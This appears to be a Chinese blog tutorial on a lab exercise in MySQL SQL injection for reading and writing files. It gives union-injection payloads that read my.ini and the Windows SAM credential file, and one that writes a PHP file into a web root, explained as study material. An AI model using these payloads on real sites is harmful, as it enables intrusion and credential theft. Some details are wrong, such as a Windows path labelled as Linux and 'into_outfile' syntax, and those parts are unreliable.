本文介绍了SQL注入的基础知识,包括用户权限、绝对路径的读写操作,以及`secure-file-priv`参数的作用和配置。通过实验步骤展示了如何利用SQL注入读取数据库文件和写入PHP探针,强调了文件操作受用户权限和数据库配置的限制。实验目的是掌握SQL注入下的文件操作技巧。
目录
1 基础知识与读写条件
1.1 用户权限
- 想要完成导入导出操作,需要当前用户具有相应文件权限。
- 在成功获取SQL注入点后,使用命令
select file_priv from mysql.user where user='root' and host='hostlhost'查询当前用户权限。
1.2 绝对路径
1.2.1 路径类型
需要知道文件的绝对路径。
1.2.2 读取文件
- 使用load_file()函数读取文件,需要使用绝对路径。
- 不同系统的绝对路径示意:
- windows路径:
C:\\Windows\\System32\\config\\SAM - Linux路径:
C:/Windows/System32/config/SAM
- windows路径:
- 注入命令例如:
?id=1 union select 1,load_file('C:\\Windows\\System32\\config\\SAM'),3
1.2.3 写入文件
- 使用
select……into_outfile'路径'导出数据到pc的指定目录下。 - 注入命令例如:
?id=1 union select 1,'<?php phpinfo();?>',3 into_outfile 'C:\\phpStudy\\PHPTutorial\\WWW\\test.php'如果网页没有报错,则说明写入成功,可以访问实验。
1.3 secure-file-priv参数
利用SQL注入漏洞进行文件读写,需要后台数据库开启一定的设置。
1.3.1 作用
- secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。
- secure_file_priv设置值及含义
| 值 | 含义 |
|---|---|
| null | 表示限制mysqld 不允许导入或导出 |
| /tmp/ | 表示限制mysqld 的导入或导出只能发生在/tmp/目录下 |
| 没有具体值 | 表示不对mysqld 的导入或导出做限制 |
1.3.2 查看方式
1.3.2.1 远程查看方式
该参数可以在数据库控制面板的变量中查看更改。在浏览器中访问数据库后台管理页面,点击变量,输入sec并回车,就可以搜索出secure-file-priv参数,我们看到这里参数的值是null,也就是说不允许导入导出。
1.3.2.2 本地查看方式
- 在安装有数据库的系统上,运行cmd,先cd到安装mysql的文件夹中
cd C:\phpStudy\PHPTutorial\MySQL\bin,再使用命令mysql -u root -p回车后再输入密码root,这里用的是phpstudy默认的账号密码登录。
- 输入命令:
show global variables like '%secure%',可以看到secure-file-priv参数的值是null,也就是说不允许导入导出。
1.3.3 更改方式
- 该参数无法通过远程方式进行更改,只能本地修改文件配置。
- 找到mysql的安装文件夹,找到里面的my.ini配置文件,以记事本或VS code等方式打开编辑。
- 在[mysqld]内加入
secure_file_priv =,保存文件退出,并重启phpstudy。
- 再次查看,可以看到secure-file-priv参数为空,表示允许导入导出操作。
2 实验简介
2.1 实验目的
- 完成SQL注入;
- 利用SQL注入漏洞完成文件复制。
2.2 实验环境
- 实验靶场——虚拟机:本节实验靶场是在win2008系统上基于phpstudy搭建的一个简单网站,win2008及phpstudy的安装过程可以参考《win2008R2SP1+WAMP环境部署》,网站的搭建过程可以参考《综合实验:一个简单丑陋的论坛网站》
- 注入工具——真实机:本实验利用火狐浏览器来实现union注入,为方便注入过程的编码,建议安装一个扩展插件harkbar,安装过程参考《HackBar免费版安装方法》由于该教程中的2.1.3harkbar我安装后无法正常使用,就安装了HackBar Quantum来代替。安装后出现下图左侧的东西。
3 实验步骤
3.1 判断注入点与注入类型
在该阶段主要是尝试不同的输入参数,根据网页反馈信息来判断是否存在注入点以及注入类型,如是否是字符型还是数值型,是否存在延迟注入等。
-
用浏览器访问我们的留言论坛,并点击第一条留言进入测试界面。
-
将参数修改为
?id=2,并点击run,看到页面变化如下,弹出第二条留言内容,由此可见后台是根据id的不同来反馈不同信息,而id是访问者可控的,是一个注入点。
-
修改参数为
?id=1 and 1=1,返回页面与原页面一致 。通过该参数我们可以分析得到该注入数据类型为数值型,原因如下:
(1) 猜测为数值型,则后台SQL语句为 select * from table where id=1 and 1=1,where语句判断条件为真且id=1,语句正常执行。
(2) 猜测为字符型,则后台SQL语句为 select * from table where id=‘1 and 1=1’,where语句将找不到id为‘1 and 1=1’的参数,语句执行失败。
(3) 更多数值型和字符型的判断方法请查看文章《反证法:判断注入类型是数值型还是字符型》
-
修改参数为
?id=1 union select 1,2,3,4,说明原参数回显数据有4列,也可以根据传统方法先用order进行尝试。
-
修改参数为
?id=-1 union select 1,2,3,4,回显结果如下,说明有第2、3、4显示位,可以利用为union联合查询注入。
-
结论:
- 因为id参数是用户可控的,会随请求带入到数据库中执行并回显相应内容,是一个注入点。
- 根据第3步说明参数为数值型。
- 利用union联合查询有4列数据,其中第2、3、4位能回显。
3.2 获取数据库路径
参改参数为?id=-1 union select 1,2,3,@@datadir,通过该命令获取后台数据库的绝对路径,如下:
3.3 读取数据库文件配置
修改参数为?id=-1 union select 1,2,3,load_file('C:\\phpStudy\\PHPTutorial\\MySQL\\my.ini')获取数据库配置文件,并回显到网页上。问题关键转变为如何获取想要文件的路径。
3.4 写入PHP探针文件
- 假设我们通过某些方式知道了网站的根目录路径为C:\phpStudy\PHPTutorial\WWW。以后得学学怎么获取到根目录路径。
- 修改参数注入参数为
?id=-1 union select 1,2,3,'<?php phpinfo();?>' into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\test.php",出现页面如下,虽然出现警告,但是我们文件已经成功写入了。
- 在浏览器访问目标IP下的文件test.php,成功执行该文件并返回PHP探针信息。
4 总结
- 对文件进行读写既收到文件系统对用户权限的制约、也收到数据库设置的制约。
- 掌握利用SQL漏洞进行文件读写的方法。
- 后续需要进一步了解如何获取网站根目录路径的方法。
2607
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
